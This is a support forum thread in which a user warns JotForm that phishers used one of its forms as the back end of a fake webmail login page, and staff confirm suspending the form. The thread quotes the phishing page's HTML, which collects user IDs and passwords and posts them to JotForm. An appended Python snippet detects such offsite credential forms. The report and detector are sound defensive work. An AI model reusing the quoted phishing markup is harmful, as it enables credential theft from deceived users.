Detection-evading phishing from JotForm

  • Raul Landa
    Asked on February 05, 2012 at 07:19 AM

    Hello,

    Just to let you know of a slimy new tactic by phishers. The idea now is to have an innocent-looking form, like this:

    http://www.jotform.com/form/20352840566

    and then use it as a back-end for an obvious phishing attack, such as this:

    http://openwebmail.instantfreesite.com/openwebmail.htm

    If you see the source code of this last phishing page, you will see that it is nothing but a view to your own form, with the suspicious fields renamed:

    <form class="jotform-form" action="http://submit.jotform.com/submit.php" method="post" name="form_20352840566" id="20352840566" accept-charset="utf-8">
      <input type="hidden" name="formID" value="20352840566" />
      <br>
      <table align="center" border="0" cellspacing="2" cellpadding="0">
      <tr>
      <td align="right" nowrap>First Name: </td>
      <td><input type="text" name="q8_fullName8[first]" size="14" id="first_8" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Last Name: </td>
      <td><input type="text" name="q8_fullName8[last]" size="14" id="last_8" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Email: </td>
      <td><input type="email" name="q3_email3" class="form-textbox validate[Email]" id="input_3" size="20" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Domain: </td>
      <td><input type="text" name="q4_dom" size="14" id="input_4" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>UserID: </td>
      <td><input type="text" name="input_4" size="14" id="input_5" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Password: </td>
      <td><input type="password" name="q6_info" size="14" id="input_6" onchange="focuspwd()" /></td>
      </tr>
      <tr>
      <td align="right" nowrap>Re:Password: </td>
      <td><input type="password" name="q7_cinfo" size="14" id="input_7" onchange="focusloginbutton()" /></td>

  • mliz
    Answered on February 05, 2012 at 07:25 AM

    Thank you for bringing this to our attention, the form has already been suspended.

    Cheers!
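
The pattern reported in the question, a page on one host whose form sends password fields to submit.jotform.com along with a hidden formID, can be checked for mechanically when triaging a suspect page. The following is an added example, not part of the original thread and not JotForm's code; the function and class names, the FORM_BACKENDS set and the placeholder host phish.example are assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Assumption: only submit.jotform.com comes from the post; add other form backends you track.
FORM_BACKENDS = {"submit.jotform.com"}


class FormAudit(HTMLParser):
    """Record each <form>; inputs count against the most recently opened form."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.forms.append({"action": a.get("action") or "", "hidden": {}, "passwords": 0})
        elif tag == "input" and self.forms:
            form, kind = self.forms[-1], (a.get("type") or "text").lower()
            if kind == "password":
                form["passwords"] += 1
            elif kind == "hidden" and a.get("name"):
                form["hidden"][a["name"]] = a.get("value") or ""


def find_offsite_credential_forms(page_url, html):
    """Return one finding per form that sends password fields to another host."""
    parser = FormAudit()
    parser.feed(html)
    page_host = urlparse(page_url).hostname
    findings = []
    for form in parser.forms:
        target = urlparse(urljoin(page_url, form["action"])).hostname
        if form["passwords"] and target != page_host:
            findings.append({
                "target_host": target,
                "known_form_backend": target in FORM_BACKENDS,
                "form_id": form["hidden"].get("formID"),  # what to report to the provider
                "password_fields": form["passwords"],
            })
    return findings


# Constructed sample: markup abridged from the post, served from a placeholder host.
SAMPLE_URL = "http://phish.example/openwebmail.htm"
SAMPLE_HTML = """<form action="http://submit.jotform.com/submit.php" method="post">
<input type="hidden" name="formID" value="20352840566" />
<input type="password" name="q6_info" /><input type="password" name="q7_cinfo" />
</form>"""
```

The check keys on the input type and the form's destination host rather than on field names, so renaming the fields as described in the question does not affect it.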